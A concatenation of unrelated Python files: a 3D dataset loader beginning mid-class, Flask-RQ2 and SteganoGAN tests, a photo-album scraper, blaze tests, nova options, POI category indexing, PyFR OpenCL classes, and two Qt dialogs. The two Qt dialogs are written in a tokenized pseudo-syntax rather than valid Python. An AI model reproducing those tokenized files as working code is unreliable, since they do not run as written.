        if split_model_for_images:
            assert(n_views > 0)
            print('You are splitting the models by images. Make sure that you entered the correct number of views.')

        # If categories is None, use all subfolders
        if categories is None:
            categories = os.listdir(dataset_folder)
            categories = [c for c in categories
                          if os.path.isdir(os.path.join(dataset_folder, c))]
        categories.sort()

        # Read metadata file
        metadata_file = os.path.join(dataset_folder, 'metadata.yaml')
        if os.path.exists(metadata_file):
            # yaml is only required when a metadata file is present.
            # safe_load avoids constructing arbitrary Python objects from
            # the file (yaml.load without a Loader is deprecated/unsafe).
            import yaml
            with open(metadata_file, 'r') as f:
                self.metadata = yaml.safe_load(f)
        else:
            self.metadata = {c: {'id': c, 'name': 'n/a'} for c in categories}

        # Set index
        for c_idx, c in enumerate(categories):
            self.metadata[c]['idx'] = c_idx

        # Get all models
        self.models = []
        for c_idx, c in enumerate(categories):
            subpath = os.path.join(dataset_folder, c)
            if not os.path.isdir(subpath):
                logger.warning('Category %s does not exist in dataset.' % c)

            split_file = os.path.join(subpath, str(split) + '.lst')
            if not os.path.exists(split_file):
                # No split file: every subdirectory is a model.
                models_c = [f for f in os.listdir(subpath)
                            if os.path.isdir(os.path.join(subpath, f))]
            else:
                with open(split_file, 'r') as f:
                    models_c = f.read().split('\n')
            models_c = list(filter(lambda x: len(x) > 0, models_c))

            if split_model_for_images:
                # One dataset entry per (model, view) pair.
                for m in models_c:
                    for i in range(n_views):
                        self.models += [
                            {'category': c, 'model': m,
                             'category_id': c_idx, 'image_id': i}
                        ]
            else:
                self.models += [
                    {'category': c, 'model': m, 'category_id': c_idx}
                    for m in models_c
                ]

    def __len__(self):
        ''' Returns the length of the dataset. '''
        return len(self.models)

    def __getitem__(self, idx):
        ''' Returns an item of the dataset.

        Args:
            idx (int): ID of data point
        '''
        category = self.models[idx]['category']
        model = self.models[idx]['model']
        c_idx = self.metadata[category]['idx']

        model_path = os.path.join(self.dataset_folder, category, model)
        data = {}
        for field_name, field in self.fields.items():
            try:
                if self.cache_fields:
                    if self.split_model_for_images:
                        idx_img = self.models[idx]['image_id']
                    else:
                        idx_img = np.random.randint(0, self.n_views)
                    k = '%s_%s_%d' % (model_path, field_name, idx_img)

                    if k in self.cached_fields:
                        field_data = self.cached_fields[k]
                    else:
                        field_data = field.load(model_path, idx, c_idx,
                                                input_idx_img=idx_img)
                        self.cached_fields[k] = field_data
                else:
                    if self.split_model_for_images:
                        idx_img = self.models[idx]['image_id']
                        field_data = field.load(model_path, idx, c_idx,
                                                idx_img)
                    else:
                        field_data = field.load(model_path, idx, c_idx)
            except Exception:
                if self.no_except:
                    # Best-effort loading: report and return None so that
                    # collate_remove_none can drop this sample.
                    logger.warning(
                        'Error occurred when loading field %s of model %s (%s)'
                        % (field_name, model, category))
                    return None
                else:
                    raise

            if isinstance(field_data, dict):
                # A None key marks the field's "main" value; other keys are
                # stored as "<field>.<key>".
                for k, v in field_data.items():
                    if k is None:
                        data[field_name] = v
                    else:
                        data['%s.%s' % (field_name, k)] = v
            else:
                data[field_name] = field_data

        if self.transform is not None:
            data = self.transform(data)

        return data

    def get_model_dict(self, idx):
        ''' Returns the model dict (category/model/ids) for *idx*. '''
        return self.models[idx]

    def test_model_complete(self, category, model):
        ''' Tests if model is complete.

        Args:
            model (str): modelname
        '''
        model_path = os.path.join(self.dataset_folder, category, model)
        files = os.listdir(model_path)
        for field_name, field in self.fields.items():
            if not field.check_complete(files):
                logger.warning('Field "%s" is incomplete: %s'
                               % (field_name, model_path))
                return False

        return True


def collate_remove_none(batch):
    ''' Collater that puts each data field into a tensor with outer dimension
        batch size.  Samples that failed to load (None) are dropped first.

    Args:
        batch: batch
    '''
    batch = list(filter(lambda x: x is not None, batch))
    return data.dataloader.default_collate(batch)


def worker_init_fn(worker_id):
    ''' Worker init function to ensure true randomness. '''
    random_data = os.urandom(4)
    base_seed = int.from_bytes(random_data, byteorder="big")
    np.random.seed(base_seed + worker_id)
<import_from_future_stmt> absolute_import division print_function<import_stmt>os<import_from_stmt>idaskins UI_DIR<import_from_stmt>PyQt5 uic<import_from_stmt>PyQt5.Qt qApp<import_from_stmt>PyQt5.QtCore Qt<import_from_stmt>PyQt5.QtGui QCursor QFont QKeySequence<import_from_stmt>PyQt5.QtWidgets QShortcut QWidget<line_sep>Ui_ObjectInspector,ObjectInspectorBase=uic.loadUiType(os.path.join(UI_DIR 'ObjectInspector.ui'))<class_stmt>ObjectInspector(ObjectInspectorBase)<block_start>""" Rudimentary Qt object inspector. Allows for easier finding of object names and classes for usage in QSS stylesheets. """<def_stmt>__init__ self *args **kwargs<block_start>super(ObjectInspector self).__init__(*args **kwargs)<line_sep>self._selected_widget=<none><line_sep>self._ui=Ui_ObjectInspector()<line_sep>self._ui.setupUi(self)<line_sep># Make everything monospace. font=QFont('Monospace')<line_sep>font.setStyleHint(QFont.TypeWriter)<line_sep>self._ui.teInspectionResults.setFont(font)<line_sep># Register signals. 
self._update_key=QShortcut(QKeySequence(Qt.Key_F7) self)<line_sep>self._ui.btnSelectParent.released.connect(self.select_parent)<line_sep>self._update_key.activated.connect(self.update_inspection)<block_end><def_stmt>update_inspection self<block_start>widget=qApp.widgetAt(QCursor.pos())<line_sep>self.update_selected_widget(widget)<block_end><def_stmt>select_parent self<block_start><if_stmt>self._selected_widget<block_start>parent=self._selected_widget.parent()<if_stmt>parent<and>parent.inherits('QWidget')<block_start>self.update_selected_widget(parent)<block_end><block_end><block_end><def_stmt>update_selected_widget self widget<block_start><if_stmt>self._selected_widget<block_start>self._selected_widget.destroyed.disconnect(self.on_selected_widget_destroyed)<block_end>self._selected_widget=widget<if_stmt>widget<block_start>self._ui.btnSelectParent.setEnabled(widget.parent()<is><not><none>)<line_sep>self._ui.teInspectionResults.setText(("Type: {}\n"<concat>"Name: {}\n"<concat>"Number of children: {}\n"<concat>"QSS: {}").format(widget.metaObject().className() widget.objectName()<or>'<none>' len(widget.children()) widget.styleSheet()<or>'<none>' ))<line_sep>self._selected_widget.destroyed.connect(self.on_selected_widget_destroyed)<block_end><else_stmt><block_start>self._ui.teInspectionResults.setText('<no object under cursor>')<block_end><block_end><def_stmt>on_selected_widget_destroyed self obj<block_start>self._selected_widget=<none><block_end><block_end>
# -*- coding: utf-8 -*-
from redis import StrictRedis
from rq.queue import Queue
from rq.utils import import_attribute
from rq.worker import Worker
from rq_scheduler import Scheduler
import pytest

from flask_rq2 import RQ


def exception_handler(*args, **kwargs):
    # Dummy handler used to test handler registration.
    pass


def test_init_app(app, config):
    rq = RQ()
    assert 'rq2' not in getattr(app, 'extensions', {})
    assert getattr(rq, 'module', None) is None
    rq.init_app(app)
    assert rq.redis_url == config.RQ_REDIS_URL
    assert isinstance(rq.connection, StrictRedis)
    assert 'rq2' in getattr(app, 'extensions', {})


def test_rq_outside_flask():
    # Accessing the connection without an app context must fail.
    rq = RQ()
    assert pytest.raises(RuntimeError, lambda: rq.connection)


def test_config_redis(config, rq):
    assert rq.redis_url == config.RQ_REDIS_URL
    assert isinstance(rq.connection, StrictRedis)


def test_config_queues(config, rq):
    assert rq.queues == config.RQ_QUEUES


def test_config_async(app, config, rq):
    assert rq._is_async == config.RQ_ASYNC


def test_config_async_override(app, config, rq):
    rq2 = RQ(app, is_async=not config.RQ_ASYNC)
    assert rq2._is_async != config.RQ_ASYNC


def test_config_default_timeout(app, config):
    rq3 = RQ(app, default_timeout=911)
    assert rq3.default_timeout != Queue.DEFAULT_TIMEOUT
    assert rq3.default_timeout == 911


def test_config_scheduler_interval(config, rq):
    # BUG FIX: this comparison was previously evaluated but not asserted,
    # so the test could never fail.
    assert rq.scheduler_interval == config.RQ_SCHEDULER_INTERVAL


def test_config_scheduler_queue(config, rq):
    # BUG FIX: this previously *assigned* the config value to the
    # attribute instead of asserting that it was picked up from config.
    assert rq.scheduler_queue == config.RQ_SCHEDULER_QUEUE


def test_exception_handler(rq):
    rq.exception_handler(exception_handler)
    assert 'test_app.exception_handler' in rq._exception_handlers


def test_get_worker(rq):
    worker = rq.get_worker()
    assert isinstance(worker, Worker)
    assert [queue.name for queue in worker.queues] == rq.queues


def test_get_worker_with_queues(rq):
    worker = rq.get_worker('some-queue')
    assert isinstance(worker, Worker)
    queue_names = [queue.name for queue in worker.queues]
    assert queue_names != rq.queues
    assert 'some-queue' in queue_names


def test_get_worker_with_exception_handlers(rq):
    rq.exception_handler(exception_handler)
    worker = rq.get_worker()
    assert exception_handler in worker._exc_handlers


def test_get_queue(rq):
    assert rq._queue_instances == {}
    queue = rq.get_queue()
    assert rq._queue_instances != {}
    assert queue in rq._queue_instances.values()
    assert isinstance(queue, Queue)
    assert isinstance(queue, import_attribute(rq.queue_class))
    assert queue.name == rq.default_queue
    assert queue._default_timeout == rq.default_timeout
    assert queue._is_async == rq._is_async
    assert queue.connection == rq.connection


def test_get_queue_with_name(rq):
    # Queues are cached per name in _queue_instances.
    queue = rq.get_queue('some-queue')
    assert queue.name == 'some-queue'
    assert queue.name in rq._queue_instances

    name2 = 'some-other-queue'
    assert name2 not in rq._queue_instances
    queue2 = rq.get_queue(name2)
    assert queue2.name == name2
    assert name2 in rq._queue_instances


def test_get_scheduler(rq):
    scheduler = rq.get_scheduler()
    assert isinstance(scheduler, Scheduler)
    assert isinstance(scheduler, import_attribute(rq.scheduler_class))
    assert scheduler.queue_name == rq.scheduler_queue
    assert scheduler._interval == rq.scheduler_interval
    assert scheduler.connection == rq.connection


def test_get_scheduler_interval(rq):
    scheduler = rq.get_scheduler(interval=23)
    assert scheduler._interval != rq.scheduler_interval
    assert scheduler._interval == 23


def test_get_scheduler_queue(rq):
    scheduler = rq.get_scheduler(queue='other')
    assert scheduler.queue_name == 'other'


def test_get_scheduler_importerror(rq):
    # in case scheduler can't be imported
    rq.scheduler_class = 'non.existing.Scheduler'
    with pytest.raises(ImportError):
        rq.get_scheduler()
# -*- coding: utf-8 -*-

import copy
from unittest import TestCase
from unittest.mock import Mock, call, patch

import torch

from steganogan import decoders
from tests.utils import assert_called_with_tensors


class TestBasicDecoder(TestCase):

    class TestDecoder(decoders.BasicDecoder):
        # Bare subclass that skips layer construction so individual
        # methods can be tested in isolation.
        def __init__(self):
            pass

    def setUp(self):
        self.test_decoder = self.TestDecoder()

    @patch('steganogan.decoders.nn.Conv2d', autospec=True)
    def test__conv2d(self, conv2d_mock):
        # NOTE: renamed from the typo'd ``test__covn2d``; still discovered
        # by pytest via the ``test`` prefix.
        """Conv2d must be called with given args and kernel_size=3 and padding=1"""

        # run
        result = self.test_decoder._conv2d(2, 4)

        # asserts
        assert result == conv2d_mock.return_value
        conv2d_mock.assert_called_once_with(
            in_channels=2,
            out_channels=4,
            kernel_size=3,
            padding=1
        )

    @patch('steganogan.decoders.nn.Sequential')
    @patch('steganogan.decoders.nn.Conv2d')
    @patch('steganogan.decoders.nn.BatchNorm2d')
    def test___init__(self, batchnorm_mock, conv2d_mock, sequential_mock):
        """Test the init params and that the layers are created correctly"""

        # run
        decoders.BasicDecoder(2, 5)

        # assert
        expected_batch_calls = [call(5), call(5), call(5)]
        assert batchnorm_mock.call_args_list == expected_batch_calls

        expected_conv_calls = [
            call(in_channels=3, out_channels=5, kernel_size=3, padding=1),
            call(in_channels=5, out_channels=5, kernel_size=3, padding=1),
            call(in_channels=5, out_channels=5, kernel_size=3, padding=1),
            call(in_channels=5, out_channels=2, kernel_size=3, padding=1),
        ]
        assert conv2d_mock.call_args_list == expected_conv_calls

    def test_upgrade_legacy_without_version(self):
        # DOC FIX: BasicDecoder's legacy upgrade wraps ``self.layers``;
        # the old docstring wrongly claimed conv1..conv4 were used.
        """Upgrade legacy must create self._models from self.layers"""

        # setup
        self.test_decoder.layers = Mock(return_value=torch.Tensor([[5, 6], [7, 8]]))

        # run
        self.test_decoder.upgrade_legacy()

        # assert
        assert self.test_decoder._models == [self.test_decoder.layers]
        assert self.test_decoder.version == '1'

    @patch('steganogan.decoders.nn.Sequential', autospec=True)
    def test_upgrade_legacy_with_version_1(self, sequential_mock):
        """The object must be the same and not changed by the method"""

        # setup
        decoder = decoders.BasicDecoder(1, 1)
        expected = copy.deepcopy(decoder)

        # run
        decoder.upgrade_legacy()

        # assert
        assert decoder.__dict__ == expected.__dict__

    def test_forward_1_layer(self):
        """If there is only one layer it must be called with image as the only argument."""

        # setup
        layer1 = Mock(return_value=torch.Tensor([[5, 6], [7, 8]]))
        self.test_decoder._models = [layer1]

        # run
        image = torch.Tensor([[1, 2], [3, 4]])
        result = self.test_decoder.forward(image)

        # assert
        assert (result == torch.Tensor([[5, 6], [7, 8]])).all()
        call_1 = call(torch.Tensor([[1, 2], [3, 4]]))
        assert_called_with_tensors(layer1, [call_1])

    def test_forward_more_than_2_layers(self):
        """If there are more than 2 layers, they must be called adding data to each result"""

        # setup
        layer1 = Mock(return_value=torch.Tensor([[5, 6], [7, 8]]))
        layer2 = Mock(return_value=torch.Tensor([[9, 10], [11, 12]]))
        layer3 = Mock(return_value=torch.Tensor([[13, 14], [15, 16]]))
        self.test_decoder._models = [layer1, layer2, layer3]

        # run
        image = torch.Tensor([[1, 2], [3, 4]])
        result = self.test_decoder.forward(image)

        # asserts
        call_layer_1 = call(torch.Tensor([[1, 2], [3, 4]]))
        call_layer_2 = call(torch.Tensor([[5, 6], [7, 8]]))
        call_layer_3 = call(torch.Tensor([[5, 6, 9, 10], [7, 8, 11, 12]]))

        assert_called_with_tensors(layer1, [call_layer_1])
        assert_called_with_tensors(layer2, [call_layer_2])
        assert_called_with_tensors(layer3, [call_layer_3])
        assert (result == torch.Tensor([[13, 14], [15, 16]])).all()


class TestDenseDecoder(TestCase):

    class TestDecoder(decoders.DenseDecoder):
        # Bare subclass that skips layer construction so individual
        # methods can be tested in isolation.
        def __init__(self):
            pass

    def test_upgrade_legacy_without_version(self):
        """Upgrade legacy must create self._models from conv1, conv2, conv3, conv4"""

        # setup
        test_decoder = self.TestDecoder()  # instance an empty decoder
        test_decoder.conv1 = Mock(return_value=torch.Tensor([[5, 6], [7, 8]]))
        test_decoder.conv2 = Mock(return_value=torch.Tensor([[9, 10], [11, 12]]))
        test_decoder.conv3 = Mock(return_value=torch.Tensor([[13, 14], [15, 16]]))
        test_decoder.conv4 = Mock(return_value=torch.Tensor([[17, 18], [19, 20]]))

        # run
        test_decoder.upgrade_legacy()

        # assert
        expected_models = [
            test_decoder.conv1,
            test_decoder.conv2,
            test_decoder.conv3,
            test_decoder.conv4,
        ]
        assert test_decoder._models == expected_models
        assert test_decoder.version == '1'

    @patch('steganogan.decoders.nn.Sequential', autospec=True)
    def test_upgrade_legacy_with_version_1(self, sequential_mock):
        """The object must be the same and not changed by the method"""

        # setup
        decoder = decoders.DenseDecoder(1, 1)
        expected = copy.deepcopy(decoder)

        # run
        decoder.upgrade_legacy()

        # assert
        assert decoder.__dict__ == expected.__dict__

    @patch('steganogan.decoders.nn.Sequential')
    @patch('steganogan.decoders.nn.Conv2d')
    @patch('steganogan.decoders.nn.BatchNorm2d')
    def test___init__(self, batchnorm_mock, conv2d_mock, sequential_mock):
        """Test the init params and that the layers are created correctly"""

        # run
        decoders.DenseDecoder(2, 5)

        # assert
        expected_batch_calls = [call(5), call(5), call(5)]
        assert batchnorm_mock.call_args_list == expected_batch_calls

        expected_conv_calls = [
            call(in_channels=3, out_channels=5, kernel_size=3, padding=1),
            call(in_channels=5, out_channels=5, kernel_size=3, padding=1),
            call(in_channels=10, out_channels=5, kernel_size=3, padding=1),
            call(in_channels=15, out_channels=2, kernel_size=3, padding=1),
        ]
        assert conv2d_mock.call_args_list == expected_conv_calls
import re
from pathlib import Path

import requests
from funboost import boost
from parsel import Selector

"""
http://www.5442tu.com/mingxing/list_2_1.html  下载所有明星图片
(Downloads every celebrity picture album listed on the site above.)
"""


@boost('xiaoxianrou_list_page', qps=0.05)
def cralw_list_page(page_index):
    # NOTE(review): function name has a typo ("cralw"); kept unchanged
    # because it doubles as the queue consumer's registered callable.
    # Fetch one listing page and enqueue every album found on it.
    url = f'http://www.5442tu.com/mingxing/list_2_{page_index}.html'
    page = Selector(requests.get(url).content.decode('gbk'))
    for anchor in page.xpath('//div[@class="imgList2"]/ul/li/a[1]'):
        crawl_detail_page.push(
            anchor.xpath('./@href').extract_first(),
            anchor.xpath('./@title').extract_first(),
            1,
            is_first_picture=True,
        )


@boost('xiaoxianrou_detail_page', qps=2, do_task_filtering=True)
def crawl_detail_page(url, title, picture_index, is_first_picture=False):
    # Download one picture of an album; on the album's first page, also
    # enqueue the remaining pages.
    sel = Selector(requests.get(url).content.decode('gbk'))
    if is_first_picture:
        # Albums are themselves paginated ("共N页"); push pages 2..N.
        total_page_str = sel.xpath('//div[@class="page"]/ul/li/a/text()').extract_first()
        total_page = int(re.search(r'共(\d+)页', total_page_str).group(1))
        for p in range(2, total_page + 1):
            next_pic_page_url = url[:-5] + f'_{p}.html'
            crawl_detail_page.push(next_pic_page_url, title, picture_index=p)

    pic_url = sel.xpath('//p[@align="center"]/a/img/@src').extract_first()
    resp_pic = requests.get(pic_url)
    Path(f'./pictures/{title}/').mkdir(parents=True, exist_ok=True)
    target = Path(f'./pictures/{title}/') / Path(f'./{title}_{picture_index}.jpg')
    target.write_bytes(resp_pic.content)  # save the picture to disk
    print(f'''保存图片成功:\n {target.absolute()} ''')


if __name__ == '__main__':
    # Reset both queues, seed listing pages 1..9, then start consuming.
    cralw_list_page.clear()
    crawl_detail_page.clear()
    for p in range(1, 10):
        cralw_list_page.push(p)
    cralw_list_page.consume()
    crawl_detail_page.consume()
import numpy as np
from blaze.expr import symbol
from datashape import dshape, isscalar


def test_array_dshape():
    """Shape, schema, length and rank of a 2-d symbol."""
    x = symbol('x', '5 * 3 * float32')
    assert x.shape == (5, 3)
    assert x.schema == dshape('float32')
    assert len(x) == 5
    assert x.ndim == 2


def test_element():
    """Scalar indexing yields a scalar dshape and prints as x[i, j]."""
    x = symbol('x', '5 * 3 * float32')
    elem = x[1, 2]
    assert isscalar(elem.dshape)
    assert elem.dshape == dshape('float32')
    assert str(elem) == 'x[1, 2]'

    y = symbol('x', '5 * float32')
    assert isscalar(y[3].dshape)


def test_slice():
    """Slicing trims the outer dimension and keeps the record schema."""
    x = symbol('x', '5 * 3 * {name: string, amount: float32}')
    assert x[2:, 0].dshape == dshape('3 * {name: string, amount: float32}')
    assert x[2:].dshape == x[2:, :].dshape

    # Make sure that these are hashable
    hash(x[:2])
    hash(x[0, :2])

    assert str(x[1]) == 'x[1]'
    assert str(x[:2]) == 'x[:2]'
    assert str(x[0, :2]) == 'x[0, :2]'
    assert str(x[1:4:2, :2]) == 'x[1:4:2, :2]'


def test_negative_slice():
    x = symbol('x', '10 * 10 * int32')
    assert x[:5, -3:].shape == (5, 3)


def test_None_slice():
    # None inserts a new axis of length one.
    x = symbol('x', '10 * 10 * int32')
    assert x[:5, None, -3:].shape == (5, 1, 3)


def test_list_slice():
    x = symbol('x', '10 * 10 * int32')
    assert x[[1, 2, 3], [4, 5]].shape == (3, 2)


def test_list_slice_string():
    x = symbol('x', '10 * 10 * int32')
    assert str(x[[1, 2, 3]]) == "x[[1, 2, 3]]"


def test_slice_with_boolean_list():
    # Boolean masks are normalized to the positions of the True entries.
    x = symbol('x', '5 * int32')
    expr = x[[True, False, False, True, False]]
    assert expr.index == ([0, 3],)


def test_slice_with_numpy_array():
    x = symbol('x', '2 * int32')
    assert x[np.array([True, False])].isidentical(x[[True, False]])
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 <NAME>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from oslo_config import cfg

base_options = [
    cfg.IntOpt(
        'password_length',
        default=12,
        min=0,
        help='Length of generated instance admin passwords.'),
    cfg.StrOpt(
        'instance_usage_audit_period',
        default='month',
        regex='^(hour|month|day|year)(@([0-9]+))?$',
        help='''
Time period to generate instance usages for. It is possible to define optional
offset to given period by appending @ character followed by a number defining
offset.

Possible values:

* period, example: ``hour``, ``day``, ``month`` or ``year``
* period with offset, example: ``month@15`` will result in monthly audits
  starting on 15th day of month.
'''),
    # BUG FIX: the "month" literal above previously had an unbalanced
    # closing backtick (``month`), producing broken reST in generated docs.
    cfg.BoolOpt(
        'use_rootwrap_daemon',
        default=False,
        help='''
Start and use a daemon that can run the commands that need to be run with
root privileges. This option is usually enabled on nodes that run nova compute
processes.
'''),
    cfg.StrOpt(
        'rootwrap_config',
        default="/etc/nova/rootwrap.conf",
        help='''
Path to the rootwrap configuration file.

Goal of the root wrapper is to allow a service-specific unprivileged user to
run a number of actions as the root user in the safest manner possible.
The configuration file used here must match the one defined in the sudoers
entry.
'''),
    cfg.StrOpt(
        'tempdir',
        help='Explicitly specify the temporary working directory.'),
]


def register_opts(conf):
    """Register the base options on the given ConfigOpts instance."""
    conf.register_opts(base_options)


def list_opts():
    """Return this module's options keyed by group, for oslo.config
    sample-file generation."""
    return {'DEFAULT': base_options}
# openpoiservice/server/categories.py

import copy
import os


class CategoryTools(object):
    """Loads the YAML category configuration and builds lookup indices
    mapping OSM tags, category ids and category groups to each other."""

    def __init__(self, categories_file):
        """Parse the category file and derive all indices.

        Args:
            categories_file: file name of the category YAML configuration,
                relative to this module's directory.
        """
        # yaml is only needed here, so import it at the point of use.
        import yaml

        self.basedir = os.path.abspath(os.path.dirname(__file__))
        # BUG FIX: the file handle was previously opened inline and never
        # closed; the context manager guarantees it is released.
        with open(os.path.join(self.basedir, categories_file)) as f:
            self.categories_object = yaml.safe_load(f)

        self.category_group_ids = []        # all known group ids
        self.category_ids = []              # all known category ids
        self.group_index = {}               # group id -> [category ids]
        self.category_to_group_index = {}   # category id -> group info
        self.category_index = {}            # tag name -> {tag value: cat id}
        self.category_ids_index = {}        # category id -> poi name/group
        self.generate_category_indices()

    def unify_categories(self, filters):
        """Merge the 'category_group_ids' and 'category_ids' filters into
        one de-duplicated list of category ids.

        Args:
            filters: dict that may contain 'category_group_ids' and/or
                'category_ids' lists.

        Returns:
            list of category ids; group-derived ids come first, followed
            by any explicitly requested ids not already covered.
        """
        category_ids_of_group = []
        if 'category_group_ids' in filters:
            for group_id in filters['category_group_ids']:
                # Unknown group ids are silently ignored.
                if group_id in self.group_index:
                    category_ids_of_group.extend(self.group_index[group_id])

        if 'category_ids' in filters:
            in_first = set(category_ids_of_group)
            in_second = set(filters['category_ids'])
            in_second_but_not_in_first = in_second - in_first
            return category_ids_of_group + list(in_second_but_not_in_first)

        return category_ids_of_group

    def generate_category_indices(self):
        """Populate all index structures from ``self.categories_object``.

        The configuration has the shape
        ``{group_name: {'id': group_id, 'children': {tag: {poi: cat_id}}}}``.
        """
        # Deep-copy so the iteration never aliases the source mapping.
        for k, v in copy.deepcopy(self.categories_object).items():
            group_name = k
            group_id = v['id']
            self.group_index[group_id] = []
            self.category_group_ids.append(int(group_id))
            group_children = v['children']

            for tag_name, pois in group_children.items():
                # The same OSM tag may appear under several groups; merge.
                if tag_name in self.category_index:
                    self.category_index[tag_name].update(pois)
                else:
                    self.category_index[tag_name] = pois

                for poi, cat_id in pois.items():
                    self.category_ids_index[cat_id] = {
                        'poi_name': poi,
                        'poi_group': group_name,
                    }
                    self.category_ids.append(int(cat_id))
                    self.group_index[group_id].append(int(cat_id))
                    if cat_id not in self.category_to_group_index:
                        self.category_to_group_index[cat_id] = {
                            'group_id': v['id'],
                            'group_name': k,
                        }

    def get_category(self, tags):
        """Map a dict of OSM tags to the category ids they belong to.

        Args:
            tags: mapping of tag name -> tag value (may be empty).

        Returns:
            list of positive category ids matched by the tags.
        """
        categories = []
        if bool(tags):
            for tag_name, tag_value in tags.items():
                if tag_name and tag_name in self.category_index and \
                        tag_value in self.category_index[tag_name]:
                    category_id = self.category_index[tag_name][tag_value]
                    # Non-positive ids mark tags that are deliberately
                    # excluded from categorization.
                    if category_id > 0:
                        categories.append(category_id)
        return categories
# -*- coding: utf-8 -*-

from functools import cached_property

import numpy as np

import pyfr.backends.base as base


class _OpenCLMatrixCommon:
    @cached_property
    def _as_parameter_(self):
        # Expose the raw buffer handle so instances can be passed directly
        # to ctypes-based OpenCL API calls.
        return int(self.data)


class OpenCLMatrixBase(_OpenCLMatrixCommon, base.MatrixBase):
    def onalloc(self, basedata, offset):
        self.basedata = basedata
        self.offset = offset

        # A non-zero offset requires a sub-buffer view of the allocation.
        self.data = basedata.slice(offset, self.nbytes) if offset else basedata

        # Apply any initial value, then drop the reference to it.
        if self._initval is not None:
            self._set(self._initval)
        del self._initval

    def _get(self):
        # Host-side staging buffer.
        buf = np.empty((self.nrow, self.leaddim), dtype=self.dtype)

        # Blocking device-to-host copy.
        self.backend.queue.barrier()
        self.backend.cl.memcpy(self.backend.queue, buf, self.data,
                               self.nbytes, blocking=True)

        # Unpack into the caller-visible layout.
        return self._unpack(buf[None, :, :])

    def _set(self, ary):
        buf = self._pack(ary)

        # Blocking host-to-device copy.
        self.backend.queue.barrier()
        self.backend.cl.memcpy(self.backend.queue, self.data, buf,
                               self.nbytes, blocking=True)


class OpenCLMatrixSlice(_OpenCLMatrixCommon, base.MatrixSlice):
    @cached_property
    def data(self):
        if not self.offset:
            return self.basedata

        nbytes = ((self.nrow - 1)*self.leaddim + self.ncol)*self.itemsize
        return self.basedata.slice(self.offset, nbytes)


class OpenCLMatrix(OpenCLMatrixBase, base.Matrix):
    pass


class OpenCLConstMatrix(OpenCLMatrixBase, base.ConstMatrix):
    pass


class OpenCLView(base.View):
    pass


class OpenCLXchgView(base.XchgView):
    pass


class OpenCLXchgMatrix(OpenCLMatrix, base.XchgMatrix):
    def __init__(self, backend, ioshape, initval, extent, aliases, tags):
        super().__init__(backend, ioshape, initval, extent, aliases, tags)

        # Page-locked host buffer for MPI to send/recv from.
        shape, dtype = (self.nrow, self.ncol), self.dtype
        self.hdata = backend.cl.pagelocked_empty(shape, dtype)


class OpenCLGraph(base.Graph):
    def commit(self):
        super().commit()

        # Map each kernel to its slot in the event table.
        evtidxs = {}

        # Kernel list: (kernel, event slots to wait on, has dependents).
        self.klist = klist = []

        for i, k in enumerate(self.knodes):
            evtidxs[k] = i

            # Resolve the event indices of the kernels we depend on.
            wait_evts = [evtidxs[dep] for dep in self.kdeps[k]] or None

            klist.append((k, wait_evts, k in self.depk))

        # MPI requests which must wait on kernel completion events.
        self.mreqlist = [
            (req, [evtidxs[dep] for dep in deps])
            for req, deps in zip(self.mpi_reqs, self.mpi_req_deps)
            if deps
        ]

    def run(self, queue):
        from mpi4py import MPI

        events = [None]*len(self.klist)
        wait_for_events = self.backend.cl.wait_for_events

        # Enqueue every kernel, translating wait slots to actual events.
        for i, (k, wait_for, ret_evt) in enumerate(self.klist):
            if wait_for is not None:
                wait_for = [events[j] for j in wait_for]

            events[i] = k.run(queue, wait_for, ret_evt)

        # Flush so the enqueued kernels actually start executing.
        queue.flush()

        # Kick off the MPI requests that have no kernel dependencies.
        MPI.Prequest.Startall(self.mpi_root_reqs)

        # Start the remaining requests once their kernels have completed.
        for req, wait_for in self.mreqlist:
            wait_for_events([events[j] for j in wait_for])
            req.Start()

        # Block until every MPI request has completed.
        MPI.Prequest.Waitall(self.mpi_reqs)
<import_from_stmt>PyQt4 QtGui QtCore<import_from_stmt>PyQt4.QtCore Qt<class_stmt>Table(QtGui.QDialog)<block_start><def_stmt>__init__ self parent=<none><block_start>QtGui.QDialog.__init__(self parent)<line_sep>self.parent=parent<line_sep>self.initUI()<block_end><def_stmt>initUI self# Rows <block_start>rowsLabel=QtGui.QLabel("Rows: " self)<line_sep>self.rows=QtGui.QSpinBox(self)<line_sep># Columns colsLabel=QtGui.QLabel("Columns" self)<line_sep>self.cols=QtGui.QSpinBox(self)<line_sep># Cell spacing (distance between cells) spaceLabel=QtGui.QLabel("Cell spacing" self)<line_sep>self.space=QtGui.QSpinBox(self)<line_sep># Cell padding (distance between cell and inner text) padLabel=QtGui.QLabel("Cell padding" self)<line_sep>self.pad=QtGui.QSpinBox(self)<line_sep>self.pad.setValue(10)<line_sep># Button insertButton=QtGui.QPushButton("Insert" self)<line_sep>insertButton.clicked.connect(self.insert)<line_sep># Layout layout=QtGui.QGridLayout()<line_sep>layout.addWidget(rowsLabel 0 0)<line_sep>layout.addWidget(self.rows 0 1)<line_sep>layout.addWidget(colsLabel 1 0)<line_sep>layout.addWidget(self.cols 1 1)<line_sep>layout.addWidget(padLabel 2 0)<line_sep>layout.addWidget(self.pad 2 1)<line_sep>layout.addWidget(spaceLabel 3 0)<line_sep>layout.addWidget(self.space 3 1)<line_sep>layout.addWidget(insertButton 4 0 1 2)<line_sep>self.setWindowTitle("Insert Table")<line_sep>self.setGeometry(300 300 200 100)<line_sep>self.setLayout(layout)<block_end><def_stmt>insert self<block_start>cursor=self.parent.text.textCursor()<line_sep># Get the configurations rows=self.rows.value()<line_sep>cols=self.cols.value()<if_stmt><not>rows<or><not>cols<block_start>popup=QtGui.QMessageBox(QtGui.QMessageBox.Warning "Parameter error" "Row and column numbers may not be zero!" 
QtGui.QMessageBox.Ok self)<line_sep>popup.show()<block_end><else_stmt><block_start>padding=self.pad.value()<line_sep>space=self.space.value()<line_sep># Set the padding and spacing fmt=QtGui.QTextTableFormat()<line_sep>fmt.setCellPadding(padding)<line_sep>fmt.setCellSpacing(space)<line_sep># Inser the new table cursor.insertTable(rows cols fmt)<line_sep>self.close()<block_end><block_end><block_end>
